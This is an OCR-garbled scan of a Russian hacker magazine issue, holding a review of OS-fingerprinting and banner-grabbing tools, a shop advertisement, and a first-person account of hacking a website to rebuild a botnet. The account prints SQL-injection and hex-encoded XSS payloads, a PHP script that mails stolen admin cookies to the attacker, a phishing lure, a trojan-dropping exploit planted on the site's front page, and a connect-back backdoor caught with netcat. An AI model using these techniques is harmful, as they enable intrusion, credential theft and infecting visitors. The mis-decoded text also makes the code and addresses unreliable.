ЕШЬ О ПРОТИВНИКЕ, ТЕМ ВЫШЕ 
ШАНСЫ, ЧТО ТЫ ОТПРАВИШЬ ЕГО 
В НОКДАУН ОДНИМ УДАРОМ. НИ 
ОДНА СЕТЕВАЯ АТАКА НЕ ОБХО- 
ДИТСЯ БЕЗ ПРЕДВАРИТЕЛЬНОГО 



ОПРЕДЕЛЕНИЯ ТИПА УДАЛЕННОЙ 
ОС И СНЯТИЯ БАННЕРОВ С ЗАПУ- 
ЩЕННЫХ НА МАШИНЕ СЕРВИСОВ. 
В ДАЛЬНЕЙШЕМ ПОЛУЧЕННЫЕ 
ДАННЫЕ ОКАЖУТСЯ КРИТИЧЕСКИ 
НЕОБХОДИМЫМИ ДЛЯ ВЗЛОМА. 
ВЕДЬ ДОЛБИТЬ ЛИНУКСОВЫЙ 
РРЮРТРБ СПЛОИТОМ ДЛЯ ВИНДО- 



ВОГО ЗЕВѴ-ІІ — ЗАНЯТИЕ ДЛЯ ДУ- 
РАЧКОВ. ЧТОБЫ ТЕБЕ БЫЛО КОМ- 
ФОРТНЕЙ ПРОИЗВОДИТЬ РАЗВЕ- 
ДЫВАТЕЛЬНЫЕ МЕРОПРИЯТИЯ, 

МЫ ПОДГОТОВИЛИ ОБЗОР СОВРЕ- 
МЕННОГО СОФТА ДЛЯ НЕМОТЕ 
РІМОЕВРВІЫТІМО'А. 

I Александр Любимов ака ЗазЫкз (геаІ_ззІпх@таіІ.ги) 



[инструментарий следователя] 
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описание Это мощный и сильно продвину- 
тый инструмент, разработанный на основе 
научных исследований Офира Аркина. Ал- 
горитм работы программы не особенно 
сложный, для нас самым важным моментом 
будет тот факт, что программа использует 
ІЮР-пакеты для снятия отпечатков. Соотве- 
тственно, если ответа на ІЮР-запрос от 
удаленного компьютера не поступит, то оп- 
ределить ОС ХргоЬе не сможет. 

Вообще, при запуске этой тулзы можно ука- 
зать довольно много опций, которые способ- 
ствуют гибкой настройке. 

использование Сейчас я расскажу про 
самые интересные флаги. Режим сканиро- 
вания ТСР-портов указывается флагом -Т; 
тут нужно указать интересуемый диапазон, 
хотя бы так: -Т20-80,1 10,3306. Причем в 
этом случае хргоЬе попытается найти и за- 
фильтрованные брандмауэром порты. Ана- 
логичным образом производится проверка 
и ІЮР-портов, которая активируется фла- 
гом -II. Параметр -ѵ выдает подробную ин- 
формацию по загруженным модулям прог- 
раммы (активировать и дезактивировать 
модули можно флагами -М и -О). Есть воз- 
можность трассировки хоста (флагом -г). 
При желании можно сохранить отчет прог- 
раммы в формате ХМІ_ параметром -X. 

особенности Операционную систему, ис- 
пользуемую на сервере, ХргоЬе определяет 
довольно точно, а если в процессе появи- 
лись спорные моменты, то в отчет войдет 
также список наиболее вероятных ОС с 
процентным соотношением вероятности. 

выводы Программа мне очень понрави- 
лась и показала себя с лучшей стороны в 
многочисленных тестах, поэтому возьми 
ХргоЬе себе на заметку, так как она не раз 
подскажет тебе правильное решение. 



риЬ/зірІюп/зірІюп-О.О.З- 1 .згс.грт 

описание Это первый претендент среди 
софтин, реализующих пассивное исследо- 
вание стека. Сифон слушает определенный 
сетевой интерфейс, анализирует пакеты и 
строит подробные отчеты. Само собой, ис- 
пользовать эту программу для определения 
системы какого-то целевого сервера, с ко- 
торым ты не находишься в рамках одной се- 
ти, не получится. Эта программа для друго- 
го: ее можно установить на захваченном 
сервере и исследовать с ее помощью внут- 
ренности корпоративной сети. 

использование При запуске следует за- 
дать всего два важных параметра: 

-і синтерфейо и -о <ІіІепате.М>. Первый 
параметр позволяет указать сетевой адап- 
тер, используемый для «отлова» и анализа 
пакетов, — за консультацией лучше всего 
обратиться к іісопіід :). Второй параметр оп- 
ределяет, куда будут сложены все найден- 
ные адреса и соответствующие адресам 
оси. Довольно часто, когда зірЬоп не в сос- 
тоянии узнать ОС, он оставляет напротив ІР 
длину окна пойманного ТСР-пакета. В фай- 
ле озргіпіз.сопі в формате «размер_ок- 
на:ТТІ_:ОР:операционная_система» лежат 
около полтинника осей: 

21 Э2:1 28:1 :ѴѴіпсІо\л/з N1 / ѴѴіпЭх 
4470:128:1 :ѴѴіпсІо\л/з 2000 РС1 
2328:255:1 :ЗоІагіз 2.6 - 2.7 

особенности Еще раз подчеркну, что 
зірЬоп анализирует стек в пассивном режи- 
ме, не инициализируя соединений. Я наме- 
каю на то, что для получения более-менее яс- 
ной картины сети и подключенных к ней ПК (и 
названиями осей, разумеется) необходимо 
некоторое время. Сколько именно его пона- 
добится, сказать тяжело, но если программа 
установлена на сервере в сети и к нему обра- 
щается приличное число машин, то результат 
можно получить в пределах получаса. 

выводы Вообще, мне понравилась эта 
программа и я рекомендую тебе повозиться 
с ней. В качестве безобидного применения 
ее можно поставить на любой ѵѵеЬ-сервер и 
собирать почти маркетинговую информа- 
цию по используемым посетителями опера- 
ционным системам. 



РОР 

Шр://!сатІиі. согесіитр . сх/рОі. ідг 



описание Навороченный анализатор тра- 
фика на манер сифона. Софтина была раз- 
работана Михаилом Залевским, и по коли- 
честву возможностей рОІ, наверное, являет- 
ся лидером среди утилит своего рода. Пере- 
числю самые важные особенности, а заод- 
но и нужные флаги. 

использование 

■ Работа в режиме демона (флаг -б) 

■ Полный дамп полученных пакетов (-х) 

■ Прослушивание конкретного сокета (-О) 

■ Возможность запустить программу в 
сПгооІ и сделать зеіиісі для любого юзера (-и) 

■ Считывание из файла образа, снятого 
с помощью утилиты Ісрбитр, считается 
очень продвинутой возможностью (-з) 

■ Проставление временных меток, 
однострочный режим логирования, 
сохранение результатов в базе МѴЗОІ_ 
и так далее 

особенности После инсталляции в систе- 
му бинарник можно запустить без парамет- 
ров, либо с опцией -і, которой следует пере- 
дать имя сетевого интерфейса, на котором 
должно происходить прослушивание. 

выводы Я думаю, что дальнейшие ком- 
ментарии относительно рОІ излишни :). 
Программа обладает огромным потенциа- 
лом, функциональностью и отлично показа- 
ла себя в моих тестах. 







[нежные прикосновения] 

Про технологию снятия отпечатков сетевого стека 
в твоем любимом журнале упоминалось уже неоднок- 
ратно. Если ты читал внимательно, то, наверное, зна- 
ешь, что для определения типа ОС на машину отправ- 
ляются специальные ІР-пакеты, которые не несут в се- 
бе особенной информации, но каждая операционка 
реагирует на такие запросы по-разному. Какими паке- 
тами и в каком порядке ответит система, и определяет 
ее принадлежность к тому или иному семейству. 
Совокупность таких ответов образует сигнатуру, ко- 
торая позволяет отличать одни операционки от дру- 
гих. Наборы сигнатур различных систем собирают в 
единую базу и используют для ОЗ Ііпдегргіпііпд'а. 
Разумеется, что разнообразные утилиты использу- 
ют различные методики для снятия отпечатков. 
Всего есть два вида методов анализа сетевого стека: 
активный и пассивный. С активным все предельно 
просто: отправили несколько пакетов, ждем ответа и 
анализируем его содержимое. При пассивном иссле- 
довании стека все описанные выше действия проходят 
без отправки запросов на удаленный хост — компью- 
тер просто ждет появления пакета с машины и ана- 
лизирует его. Различия налицо: вместо того чтобы 
«провоцировать» удаленный хост ответить на наши 
данные, мы просто банально выжидаем, пока компью- 
тер САМ не проявит сетевую активность. Сегодня я 
расскажу про тулзы, которые реализуют оба метода 
исследования. Вот эти негодяи. 



ВЕЛИКИИ И УЖАСНЫЙ 

Многие спросят меня, почему я в этом 
обзоре не упомянул знаменитый ска- 
нер Федора (Руосіог) ІЧтар? 

Для этого есть две причины. Ну, во-пер- 
вых, про этот портсканер писали везде, 
где только можно. Во-вторых, как мне 
кажется, ЫеШаррег — не такая уж и 
универсальная программа. То есть она 
и в самом деле умеет многое: скрытое 
сканирование (-зЗ), определение оси (-О) 
и так далее, однако на практике исполь- 
зовать птар не всегда удобно и резон- 
но. Например, хакер получил рута через 
поЬосІу-шелл, и теперь ему необходимо 
как можно быстрее просканировать 
подсетку на наличие других машин и 
бажных сервисов. 

Разве в этом случае кому-то придет 
в голову тянуть громоздкий дистр, 
устанавливать его в систему, удов- 
летворяя все зависимости, и ждать, 
пока он досканит всю подсеть? То же 
самое можно сделать небольшим на- 
бором утилит. Короче говоря, он не 
во всех ситуациях актуален. Тем не 
менее, как инструмент для аудита 
сетевой безопасности, птар еще 
довольно долго будет находиться 
на лидирующих позициях. 





Почти все упомянутые / 
в обзоре утилиты 
скрываются на этих 
сайтах: 

шшш.зесигііуіосиз.сот 

шшш.зесигііуІаЬ.ги 

шшш.шеЬ-баск.ги 

шѵѵш.ійс.огд 

ѵѵшш.іпзесиге.огд 

Полное описание технологии 
йпдегргіпі, которая использу- 
ется в ИеіМаррег'е, находится 
по адресу 

ѵѵѵѵѵѵ.іпзесиге.огд/птар/птар- 

РпдегргіпІіпд-агІісІе-ги.ЫтІ. 

Для твоих сетевых экспери- 
ментов под виндой может при- 
годиться Ѵ/іпрсар, который 
очень удобно скачивается с 
шшмпрсарюгд/іпзІаІІ/деіаиІІМт 
или уверенной рукой 
берется с нашего диска :). 

Чтобы не лазить по всему 
инету и не скачивать эти 
все программы, тратя свой 
драгоценный трафик, мы 
выложили их на диске. 



[ХАКЕР 12 [84] 05 > ВЗЛОМ 069 ] 






[ХАКЕР 12 [84] 05 > ВЗЛОМ 070 ] 



Для начала проясню некоторые общезатасканные вопросы, чтобы 
больше к ним никто не возвращался. Что же такое баннер сервиса? 
Это приветственное сообщение, выдаваемое сервером при подключе- 
нии. Представим, что у меня на локальной машине запущен ригеТірсІ. 
Когда я присоединюсь к нему стандартным Кр-клиентом, покажется 
примерно такая вот картина: 

220 ѴѴеІсоте Іо Риге-РТРсІ 

220-Ѵои аге изег питЬег 1 о! 50 аііоѵѵесі. 

220-І_осаІ Ііте із подо 20:33. Зегѵег рогі: 21. 

220 Уои ѵѵіІІ Ье йізсоппесіесі аЙег 15 тіпиіез о! іпасііѵііу. 

\ 



Вот это и есть «баннер» Кр-сервиса. Вообще, Ьаппег может выглядеть 
по-другому, а может и вовсе отсутствовать. Чаще всего в нем указана 
версия сервиса (например, для 83Н это будет запись такого вида: 
ЗЗН-1 ,99-ОрепЗЗН_3.6.1 р2) либо другой текст, указанный админист- 
ратором (Ыагкотапу Ѳо Ноте, к примеру) при настройке демона. 
Впрочем, чаще всего приветственное сообщение не трогают, и поэто- 
му становится возможным определить версию демона и даже подоб- 
рать к ней работающий риЫіс-эксплойт. Кстати, демон при опросе мо- 
жет косвенно выдать и инфу об установленной на машине операцион- 
ке, что, собственно, взломщикам только на руку. Именно поэтому Ьап- 
пег дгаЬЬіпд (сбор баннеров — англ.) для взломщика очень важен, да- 
же намного больше, чем определение версии удаленной операционки. 
Для этих целей бывалыми хакерами было написано огромное множе- 
ство утилит и спецпрограмм, занимающихся этим нехитрым делом :). 



[сетевые грабители] 



ѲВАВВВ 

уѵуѵуѵ.зесигіІуіосиз.сот/сіаіаЛооІз/ 
дгаЬЬЬ-0.0.7.іаг.дг 

описание Это поистине ураганный граб- 
бер банеров, который написали крутые пар- 
ни из ТЕЗО и который очень удобно исполь- 
зовать для сканирования больших подсетей. 

использование 

Опций у этой тулзы не так уж и много: 

-х — количество подключений 
(по умолчанию 250) 

-а — начальный адрес 

для сканирования (вида а.Ь.с.сІ) 

-Ь — конечный адрес сканирования 
-т — многострочный режим, 

в котором с сервиса считывается 
не первая строка приветствия, 
а все сообщения 

-з — итоговый отчет после окончания скана 

После запуска и передачи параметров нуж- 
но указать, какие именно порты тебя инте- 
ресуют. 

особенности Эту утилиту очень удобно 
использовать как для поиска живых хостов 
вообще, так и для определения бажного 
сервиса, который можно поэксплуатиро- 
вать. Кстати, так очень многие и поступают: 
ищут паблик-сплоиты для фтп, Іеіпеісі, зтф, 
запускают граббер в фоновом режиме, нат- 
равливая его на случайную сеть. Когда за- 
кончится прочесывание подсетки, взлом- 
щик ищет в отчете машины с установлен- 
ным дырявым демоном и попросту рутают 
тачку без особых усилий. 

выводы ТЕЗО пишут отличные продукты, 
и с помощью этого граббера куча хакеров 
сканируют огромные сети, отыскивая толь- 
ко лишь заведомо бажные машины. Него- 
дяи, конечно, но что поделать. 




АМАР 

уѵуѵуѵ. іііс.огд/сіо ѵѵпіоасі.ріір ?і=г& і= 
атар-5.2.1аг.дМр://хргоЬе.зоигсеіогде.пеІ 

описание Это очень удобная и профессио- 
нально сделанная тулза от немецких хакеров 
ТНС. Умеет очень многое, кроме обычного 
снятия баннеров с машины. 

использование Запускается атар так: 

$ атар [тосіез] [ орііопз] Ііозі рогіз 

Порты должны быть указаны через пробел. 
А о режимах и опциях мы сейчас поговорим. 
Вот самые вкусные опции и параметры: 

-А — включает режим, в котором 

определяется сервис, работающий 
на данном порту 
(баннеры не снимаются) 

-В — просто снять баннеры 
и вывести их на экран 
-Р — атар становится обычным 

портсканером, определяющим 
состояние службы 

(баннеры и сервисы не определяются) 
-і — считывать данные о машине из отчета, 
составленного птар'ом (для этого, 
соответственно, машину нужно 
предварительно просканировать птар'ом) 
-сі — сбрасывать дамп всех запросов в файл 

Также атар умеет работать с адресами 
ІРѴ6 (флаг -6), посылать запросы на конк- 
ретный протокол (-р), производить проверку 
ІЮР портов (-и) и так далее. 

особенности Говоря откровенно, не такая 
уж эта программа и универсальная, как ка- 
жется на первый взгляд. Ведь перед ис- 
пользованием нужно знать, какие порты 
открыты, а какие — нет. Хотя, с другой сто- 
роны, если тебя интересуют лишь отдель- 
ные сервисы, то смело записывай ее в свой 
арсенал. Например, зачем тебе нужен бан- 
нер фтп, если у тебя в кармане сплоит на 
МуЗОІ_ (3306 порт)? Вот и я о том же :). 

выводы Это перспективная и актуальная 
софтина, которой пользуется много людей. 
Почему бы тебе не присоединиться к их тай- 
ному обществу? :) 



Р0Р 

Ыір://ІсатіиІ. согесіитр . сх/р0і. ідг 

описание Зкіп — это очень быстрый 
портсканер, который неплохо определяет 
сервисы. 

использование 

Запускается сканер очень просто: 

$ зкіп [орііопз] Иозіпате 

Основные опции софтины: 

-зТ обычное ТСР сканирование 

-зЗ используется зуп флаг, без установки 

соединения (как в птар'е) 

-зѴ снятие баннеров со служб 
Можно также просканить хост, а потом, про- 
читав данные из логфайла, произвести про- 
верку баннеров. 

особенности Этот сканер создан по мо- 
дульной архитектуре и к нему очень легко 
добавлять новые плагины, расширяя функ- 
циональность. 

выводы Вообще, этот проект выглядит 
немного заброшенным, однако использо- 
вать этот сканер можно, если нужно что-то 
быстрое и легкое и нет времени на сборку 
громоздких проектов. 



[конец географии] Ну вот, это все, что я хо- 
тел тебе рассказать по этой теме. Описанные 
утилиты предназначены для работы под ІІІМІХ, 
хотя некоторые (зірИоп, птар) ты можешь най- 
ти портированными под винду. А если тебе это- 
го мало, то скачай любой продвинутый зесигііу- 
зсаппег, который наделен всеми нужными фи- 
чами (333, Вейпа, РІихау, Хзрісіег и так далее). 
И еще одно, все софтины я тестировал под 
Мапбгаке І_іпих 9.2 с установленной из пакетов 
ІіЬрсар. Как мне кажется, на той же РгееВЗЭ 
5.3 с полпинка заставить все программы зара- 
ботать не получится :). Все программы нужно 
запускать под рутом, так как они используют 
гаѵѵ-сокеты, ІСМР и другие вещи, котооые 
обычным пользователям до 18 запрещены © 






поставь проверку на поток! 









Открой для себя 

новую 

реальность 



епііит 



Благодаря компьютеру РІехігоп ѴІР 
на базе процессора Іпіеі® Репііит® 4 
с технологией НТ Вы сможете 
насладиться реалистичными 
компьютерными играми. 



Компания Ф-Центр рекомендует МісгозоИ® ѴѴіпсІоѵѵз® ХР. На компьютеры 
Нехігоп устанавливаются подлинные продукты семейства Місгозоп® 
ѴѴіпсІоѵѵз®. Гарантией качества и сервисной поддержки приобретаемых Вами 
продуктов МісгозоЛ® является наличие сертификата подлинности (СегМісаІе оі 
АиІЛѳпІісіІу). 



САЛОНЫ-МАГАЗИНЫ: СЕРВИС-ЦЕНТР: 

ст.м.'Ъабушкинская", ул. Сухонская, 7А (095)105-6447 ст.м.'Ъабушкинская", ул. Молодцова, 1 (095)105-6447 

ст.м."Улица 1905 года", ул. Мантулинская, 2 . . .(095)105-6445 ФОТО ИНТЕРНЕТ КАФЕ: 

ст.м.'Ъладыкино", Алтуфьевское ш., 16 (095)105-6442 ст.м.'Ъладыкино", Алтуфьевское ш., 16 (095)105-6441 




3000 наименований товаров Самый выгодный кредит за 15 мин. Время работы: 10-20, без выходных Бесплат- 
ная доставка* Удобная автостоянка Резервирование товара через интернет Пункт обмена валюты Оплата кре- 
дитными картами Подарки покупателям Соответствие стандартам Техническая поддержка Магазин аксессуа- 
ров Магазин компьютерной литературы Обучающий курс для работы на ПК в комплекте (Г*; 

* полную информацию о товарах и услугах в конкретных магазинах компании «Ф-Центр» уточняйте на сайте МѴМѴ ѴѴ.'РСбПІбІГ.ГІЛ 



Іпіеі, логотип Іпіеі, Іпіеі Іпзісіе, логотип Іпіеі Іпзісіе, Іпіеі Сепігіпо, логотип Іпіеі Сепігіпо, Сеіегоп, Іпіеі Хеоп, Іпіеі ЗреесІЗіер, Ііапіит, Репііит и Репііит III Хеоп являются товарными знаками или заре- 
гистрированными товарными знаками корпорации Іпіеі и ее подразделений в США и других странах. 




интернет-магазин 




ѵѵѵѵѵѵ.Гсепіег.ги 




Новое Фото-Интернет кафе уже открыто! На базе компьютеров Н.ЕХТКОІЧ. 

Фото 10x15=5 руб., чашка кофе=35 руб., Интернет=50 руб. 
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Воскрешение 

ботнета 

История о том, 
как пополняются 
хакерские ботнеты 



=г 
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ПРОСНУВШИСЬ РАНО В ВОСКРЕСЕНЬЕ, 
ВКЛЮЧИВ &РЮ И ПОСТАВИВ СТАТУС В 
ИНВИЗИБЛ, Я ХОТЕЛ ЗАКОНЧИТЬ НЕДАВ- 
НО НАЧАТОЕ ДЕЛО — ВЗЛОМАТЬ ОДИН 
САЙТ В ЗОНЕ .ВС, КОТОРЫЙ БЫЛ ДОСТА- 
ТОЧНО ПОПУЛЯРНЫМ И ПОСЕЩАЕМЫМ. 
ЭТО ПОНАДОБИЛОСЬ МНЕ ДЛЯ ТОГО, 
ЧТОБЫ ВОЗРОДИТЬ ПОТЕРИ МОЕГО БОТ- 
НЕТА, НО, К СОЖАЛЕНИЮ, БОТЫ УМИРА- 
ЮТ ДОВОЛЬНО БЫСТРО :(. ВКЛЮЧИВ 
БРАУЗЕР И ПОДКЛЮЧИВ СВЕЖИЙ АНО- 
НИМНЫЙ ПРОКСИ, Я ПРИСТУПИЛ К ПО- 
ПОЛНЕНИЮ СВОЕЙ СЕТИ ЗОМБИ-МАШИН 

I _1п!ЗсЮг_ (сІг.разсаІ@таіІ.ги) 



СС 

О 



[разборки с Е К КО К 500] Страница быстро загру- 
зилась и передо мной предстало меню навигации по 
сайту. Чтобы получить доступ к некоторым дополни- 
тельным сервисам, я зарегистрировался на сайте. 
Первые пять минут бесполезного тыкания по ссыл- 
кам совершенно ничего полезного не принесли. Я ни- 
когда не любил ручной поиск скриптов и решил прос- 
канировать ресурс при помощи недавно скачанного и 
неиспробованного пакета ЫРКЗЧооІз, который имел в 
себе функцию ѵѵеЬ-анализатора, сканирующего 
структуру сайта. 

Сканер выдал мне кучу ссылок, и я принялся искать 
бажный скрипт. Некоторое время на глаза ничего по- 
дозрительного не попадалось, но вскоре я увидел 
очень интересный по своему виду линк — ѵѵѵѵѵѵ.ѵіс- 
Ит.ги/зіок.рІір?ісІ=86. Ты уже, наверное, догадался, 
что я хотел сделать. Не буду тянуть кота за хвост и ска- 
жу, что скрипт был болен 80І_-инъекцией. После про- 
верки скрипта на данную уязвимость ( тѵѵѵ.ѵісіітт / 
зЬзсіІ.рЬр?іс1=86 І ) была выдана следующая ошибка: 
ІЫТЕВМАІ_ ЗЕВѴЕВАІ_ ЕВВОВ 500. 

Ты спросишь, причем тут ЗОЬинъекция? А при том, 






если после тестирования скрипта на баг что-то изменилось (сообщение о 
любой ошибке, в том числе Еггог 500 или тому подобное), то скрипт 
действительно уязвим. Мне пришлось подбирать название таблицы, сос- 
тавлять ІІЫІОЫ-запросы. Первым, пришедшим мне в голову, оказался 
запрос следующего вида: 

ІіПр://ѵѵѵѵѵѵ.ѵійіт.ги/5іок.рІір?ісІ=-86 ІІЫІОЫ ЗЕІ.ЕСТ 0,0,0,1одіп,ра$$- 
ѵѵогфіфОДОДО РВОМ _название_таблицы_/* 

Но, к сожалению, не все складыва- 
лось в мою пользу. Во-первых, я не 
обладал достаточной квалифика- 
цией для организации этой атаки, а 
во-вторых, у меня не было никаких 
подсказок для того, чтобы выта- 
щить записи из БД: 

|Т| Мне не было известно назва- 
ние таблицы 

\2\ Мне не были известны назва- 
ния колонок 

После часа перебора названий 
таблиц мне захотелось найти ка- 
кой-нибудь другой баг, благодаря 
которому я бы смог получить шелл. Но к моему огорчению, сайт не особо 
радовал меня обилием скриптов, а этот баг, как мне казалось, был един- 
ственным :(. На сайте крутился форум рНрВВ последней версии. В публич- 
ных источниках эксплойтов к нему не было, на покупку приватной отмычки 
у меня не было лишних денег, тем более покупать было не у кого. 

Забить на такой сайт мне не особо хотелось, поэтому я решил не сда- 
ваться. Еще раз проверил сайт на баги, но опять все безуспешно. Но это 
не проблема! Я немного подумал и решил заюзать атаку ЗіХЗЗ. 

[ЗіХЗЗ в подарок!] Что за ЗіХЗЗ? Итак, поясняю. Это расшифровыва- 
ется как ЗОІ_ іпіесйоп Сгозз Зііе Зсгірііпд — два вида атак, совмещенных 
в одну: 301-инъекция для межсайтового скриптинга. Такую атаку можно 
осуществить благодаря тому, что ЗОЬзапрос вида ІІЫІОЫ ЗЕІ_ЕСТ может 
выводить произвольный текст на страницу. Если ты не знаком с данной 
технологией атаки, то советую прочитать статью о ЗіХЗЗ в статье о прод- 
винутых ЗОЬинъекциях, которую можно отыскать на ѵѵтѵ.зесигіІуІаЬ.ги. 
Для начала я решил проверить, можно ли заюзать данный баг на вра- 
жеском хосте. 

Немного помучившись с ЗОЬинъекцией для межсайтового скриптинга, 
я пришел к такому запросу: 

+ипіоп+зеІесІ+('<5СгірЬаІегІ("НеІІо, ѴѴогШ ;)");</зспрЬ');~ 

Но он тоже не был работоспособным. Насколько я понял, скрипт исполь- 
зовал включенную функцию тадіс_циоІез, поэтому я использовал обход 
этой фичи (об этом написано в статье, которую я уже упоминал) простой 
конструкцией: Ох_код_символа_. Вот что получилось: 

+ипіоп+5еІесІ+0хЗС7363726970743Е616С657274282248656С6С6Р202 

0776Е726С64203В2922293ВЗС2Е7363726970743Е2020 

Здесь 

307363726970743Е61 6С657274282248656С6С6Р2С20776Р726064203 
В2922293В302Е7363726970743Е2020 это тоже самое, что и 
('<5СгірЬаІеД("НеІІо, ѴѴогІсі ;)");</5СгірЬ');- 

Я подставил это в значение переменной ісі и обновил страницу, но на- 
дежды на удачную ЗіХЗЗ-атаку не было. К моему великому удивлению, 
передо мной появилось приветствие! Когда скрипты здороваются с то- 
бой, то это к счастью! :) 

Осуществив ХЗЗ-приветствие, я не особо обрадовался, так как очень не 
хотелось мучиться с кукисами и социальной инженерией. Хочется ска- 
зать, что ХЗЗ-атаки довольно актуальны, примеры тому — ХЗЗ на 
пагосі.ги, таіі.ги, гатЫег.ш, пеѵѵтаіі.ги и даже тісгозоН.сот. Если ХЗЗ — 
твой пробел в знаниях, то читай подшивку Хакера. Но вернемся к мое- 
му взлому. Для начала я, конечно, состряпал до боли знакомый РНР- 
скрипт (сзз.рПр) и залил его на забугорный шелл в зоне .іі: 

<? 

ІІ ( 8 <ЖКѴ_ЗТКІМ 6 =="") ехіі; 

$а=Іореп ("сІаІа.сІа(","а+"); 

Т\л/гіІе($а, "$<ЖКѴ_ЗТШе п \п\п"); 

ТсІозе($а); 
есИо "і)23г_Х553сі"; 

таіі ("ІаІа-344-ІоІ@таіІ.ги", 'Шег_Ш2_Х88е(]!_ЕаЦіІ5_соокіе$! 
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Когда-то в древности Великий Учитель решил испытать 
своих учеников, предложив им выбрать для себя мечи. 

Один ив них выбрал легкий меч, надеясь сохранить силы 
в долгом походе. Другой выбрал длинный меч, надеясь 
поразить им больше противников с безопасного 
расстояния. 

Но самым мудрым оказался третий ученик, который 
выбрал для себя самый удобный меч, ставший продолже- 
нием его руки. 

Удобство— вот разумный выбор! 



ѵѵѵѵѵѵ.окііск.гіі 
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"ЗаиЕВУ.зтвіыѳ"); 

?> 

Скрипт располагался по адресу ѵѵѵѵѵѵ.хзз-з[іеІІ.іі/сзз.р[ір. Следующий 
шаг — написание іаѵа-скрипта, который бы принимал чужие кукисы: 

>азск/а><5сгір1 Іапдиаде="іаѵа5СгірГ>ореп('[іир://\л/\л/\л/.х55- 
зЫІ.іѴсзз.рІір? Чйоситепісоокіе); </зсгірЬ<а> 

Я привел его к шестнадцатеричному виду и получил в итоге что-то вро- 
де этого: 

-шпіоп+зеІесЮхЗЕбІ 73643С2Р61 ЗЕ30736372697074206С61 6Е677561 67 
6530226А61 7661 736372697074223Е6Р70656Е2827687474703А2Р2Р777 
7772Е787373207368656С602Е69742Р6373732Е7068703Р272В646Р637 
560656Е742Е636Р6Р6В6965293В203С2Р7363726970743Е3061 ЗЕ2020 

Нехило, правда? Для такого кодирования я воспользовался обычным 
сишным перекодировщиком, который нашел в Сети. При нехватке тра- 
фика и времени можно воспользоваться ѴѴіпНех'ом, который, наверное, 
есть у каждого «джентльмена» :). 

Однако, если впарить такую ссылку админу, он заподозрит что-то не 
ладное :). Мы сделаем следующее: 

И Отправим админу письмо с сообщением о битой ссылке, вставив в 
письмо такой код: 

<ЬосІу> 

<рха 

іігеІ="ііир:/М\А/\л/.ѵісІіт.ги/5Іок.р[ір?ісІ=%2В%75%6Е%69%6Р%6Е%2В 
% 7 3 % 6 5 % 6 С % 6 5 % 6 3 % 7 4 % 2 В 0 х 3 Е 6 1 73643С2Р61 ЗЕ30736372697074 
206С61 6Е677561 676530226А61 7661 736372697074223Е6Р70656Е282 
7687474703А2Р2Р7777772Е787373207368656С6С2Е69742Р6373732Е 
7068703Р272В646Р637560656Е742Е636Р6Р6В6965293В20302Р73637 
26970743ЕЗС613Е2020">ИНр:/М\А/\А/.ѵісІіт.ги/азсі.[іІтІ</а>. 

</р> 

</Ьосіу> 

\2\ Браузер ІЕ — зло, так как он откроет две страницы (открывающую ку- 
кисы и страницу, на которую я проводил атаку). Для того чтобы узнать, 
какой у админа браузер, я создал тему на форуме «Какой браузер луч- 
ше» и при помощи классического приема социальной инженерии узнал, 
что админ юзает Орега. 

Щ Зайдя на страницу Оперой, админ может запаниковать. Чтобы побе- 
речь ему нервы, я опять модифицировал линк, вставив туда функцию 
сіосиплепі.ѵѵгііе ("Здесь текст вида 'Ошибка 404-страница не найдена 1 "). 
Однако это уже тонкости, я не буду тебя мучить перекодировкой — пусть 
ссылка останется прежней. 

[админ в Х$$-капкане] Теперь осталось только проявить навыки со- 
циальной инженерии и заманить админа в мой капкан. 

Те, кто не знаком с ХЗЗ-атаками и читал невнимательно, наверное, 
спросят: «А причем тут социальная инженерия?». Так вот, отвечу. Дан- 
ную ссылку мы будем впаривать администратору сайта, чтобы украсть 
его кукисы, затем подменить его кукисы своими и зайти в админку, 
которая располагалась в директории /адтіп. 

Все шло как по маслу: я отослал линк, замаскированный под битую 
ссылку. Оставалось ждать ответ письма от скрипта сзз.рПр и не загу- 
ливаться, так как соокіез'ы имеют такой недостаток, как «потеря сро- 
ка годности» :). Я зарегистрировал е-таіі ІаІа-344-ІоІ@таіІ.ги, который 
указал при написании скрипта (позже, для собственной же безопас- 
ности, я удалил е-таіі). 

[клюнул!] Было поздно, я уже, выключая &РЮ, собирался в оф- 
флайн, как в друг летучая мышь принесла мне письмо с темой 
ІІгег_ѵѵа 2 _ХЗЗесІ!_ЕаІ_Иіз_соокіез! :) с кукисами в теле письма! Сон 
сразу как рукой сняло. Я открыл письмо и нашел админские кукисы :). 
Вскоре, вручную подменив выпечку, я стал админом — мог войти в са- 
мописную админку, где мои возможности ограничивались заливкой 
файлов и текстовым редактором материалов. В главную страницу я 
внедрил вредоносный код, использующий известный баг в ІЕ, к кото- 
рому уже написан готовенький сплоит — ІЛ\ІІѴЕВЗАІ_ .АЫІ Іііез ИапсІІіпд 
ехріоіі, указав ему путь к трояну (иллл /ѵ.іпіесіогз. пагод. ги/зегѵег.ехе) и 
порт, открывающийся на стороне юзверя (я выставил 800). После того 
как сплоит сгенерировал вредоносный НТМІ_-код, я вставил его на 
главную страницу ХЗЗ'нутого сайта :). 



[проникновение в консоль] В принципе, дело было сделано, но 
что-то меня подталкивало захватить всю систему и добиться макси- 
мальных привилегий, порутать машинку. Я залил шелл от ВЗТ, немного 
полазал по папкам, так как РНР-шеллы очень удобны для навигации по 
системе. Тут я по привычке скомандовал ѵѵдеі, чтобы скачать соппесТ 
Ьаск бэкдор, но, увы... никаких качалок на серваке не было обнаружено. 
Я уже начал командовать саі, но зачем лишний гемор? Я взял и закачал 
его через админку в каталог /ітр :). 

Затем скомпилировал командой дсс Дтр/сЬсІ.с -о Дтр/сЬсІ, и после это- 
го мне оставалось только запустить бэкдор на 31337 порту, а также про- 
писать параметр бэкдора, чтобы он стукнулся на мой итальянский шелл 
ѵѵѵѵѵѵ.хзз-зііеіі.іі (допустим, его ІР-адрес будет 123.456.78.90). 

.Ш 123.456.78.90 

Затем я запустил на своем итальянском шелле пеісаі: 

[гооІШаІіа]# пс -I -р 31337 

После этого бэкдор удачно приконнеткился. Для начала я выполнил ко- 
манду іб, в которой говорилось о том, что мои привилегии арасПе — это 
то же, что и поЬосІу, затем выполнил команду ипате -а и узнал, что это 
очередная Ыпих-система, которая, к моему удивлению, была пропатче- 
на — такого я от админа не ожидал :). Порыться в Пізіогу-файлах (для 
тузці и интерпретатора ЬазИ) не удалось, так как на них стоял атрибут 
644. Меня очень привлекла директория гооі, которая также была закры- 
та от моих глаз. 

[нехорошо получилось] Получалось как-то нехорошо, ведь в моих 
целях было пара щелчков мыши и запуск эксплойта, который бы пору- 
тал ядро непропатченной системы :). За окном светало, и я все-таки 
решил поспать. 

